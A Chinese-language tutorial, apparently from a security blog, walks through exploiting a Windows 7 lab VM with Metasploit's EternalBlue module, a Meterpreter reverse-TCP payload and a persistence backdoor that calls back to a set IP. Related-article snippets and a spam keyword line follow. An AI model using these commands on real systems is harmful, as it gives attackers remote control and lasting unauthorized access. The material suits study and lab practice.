<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    使用MSF入侵win7并生成后門控制

    VSole2021-10-22 08:12:00

    攻擊主機系統:kali Linux 192.168.102.16

    目標主機系統:win7 192.168.102.17

    兩臺主機均在虛擬機,同一局域網內互通。

    首先啟動Metasploit

    命令 Msfconsole

    Msf啟動后會發現很多模塊,對于win7的話我們先嘗試永恒之藍漏洞來入侵,通過命令查找MS17_010漏洞相關的信息:

    Search ms17_010

    輸入命令后查找結果如圖所示,找到了四個模塊。其中有探測板塊和利用板塊。

    先探測一下有哪些主機存在漏洞。

    選擇這個輔助模塊:

    use auxiliary/scanner/smb/smb_ms17_010
    

    設置要探測主機的ip或ip范圍:

    set RHOSTS 192.168.102.17
    

    輸入exploit開始探測。

    前面顯示+號的就是可能存在漏洞的主機。可看到探測回顯我們的主機存在ms17_010漏洞

    既然得知存在漏洞那么接下來就是漏洞利用。
    選擇漏洞利用之前我們需要選擇payloads
    

    其實應該使用show options查看一下需要設置的參數,這里忽略了這一步。

    查看payloads:

    show payloads
    

    選擇漏洞利用模塊:

    use exploit/windows/smb/ms17_010_eternalblue
    

    設置payload:

    set payload windows/x64/meterpreter/reverse_tcp
    

    如果不設置RPORT的話,默認使用4444端口監聽,這里就不設置了。

    輸入exploit或者run開始攻擊。

    可見上圖我們已經利用成功
    meterpreter常見命令和參數
    輸入screenshot截屏
    

    接下來通過服務啟動生成一個持續性后門。

    run persistence -X -i 5 -p 8888 -r 192.168.113.133
    

    漏洞msf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    溢出漏洞提權是利用目標操作系統層漏洞進行權限提升,通常步驟是拿到shell后獲取目標機器的補丁信息,通過目標的補丁情況獲取相對應的漏洞,進行提權
    vulnhub之Five86-1的實踐
    2023-10-16 09:27:53
    vulnhub之Five86-1的實踐
    Metasploit 總結
    2020-08-24 11:30:35
    此功能當前是選擇加入的。此模塊利用CVE-2020-9496,并利用未經驗證的XML-RPC接口中的Java反序列化方法。最新的OFBiz版本修復了此漏洞。PR #13998 從 adfoster-R7 大大提高Metasploit工具的速度RPC調用。PR #13961 從dwelch-R7 增加了一個新RHOST_HTTP_URL的選擇,它允許用戶設定值RHOSTS,RPORT以及SSL通過指定單個URL。來自wvu-r7的 PR #14002修復了payload中的回歸問題,在該回歸中,空白壞字符沒有被編碼掉。PR #13974從dwelch-R7修正了一個錯誤認證lib/metasploit/framework/login_scanner/winrm造成的故障與沒有接受的“基本”身份驗證服務器模塊。
    當我們滲透一個網站時發現從網站滲透不進去的時候,就可以查看該網站主機開啟了哪些端口,來從其開啟的端口來進行入侵
    在我的一次工作中,我發現一些Windows設備受到MS17-010漏洞的影響。
    本篇文章是MongoDB數據庫信息泄露漏洞復現,記錄了實際中常見的MongoDB數據庫未授權訪問漏洞并如何使用,主要分為七個部分:MongoDB簡介、MongoDB安裝、MongoDB基本操作、MongoDB相關工具使用、MongoDB漏洞復現、MongoDB實戰和MongoDB防御措施。
    前兩天朋友分享了一個實驗靶場,感覺環境還不錯,于是對測試過程進行了詳細記錄。
    vulnhub之Sumo的實踐
    2023-06-25 09:11:24
    今天實踐的是vulnhub的Sumo鏡像,下載地址,https://download.vulnhub.com/sumo/Sumo.zip,用workstation導入成功,做地址掃描,sudo netdiscover -r 192.168.177.0/24,獲取到靶機地址192.168.177.141,繼續進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.17
    VSole
    網絡安全專家
    xs
      亚洲 欧美 自拍 唯美 另类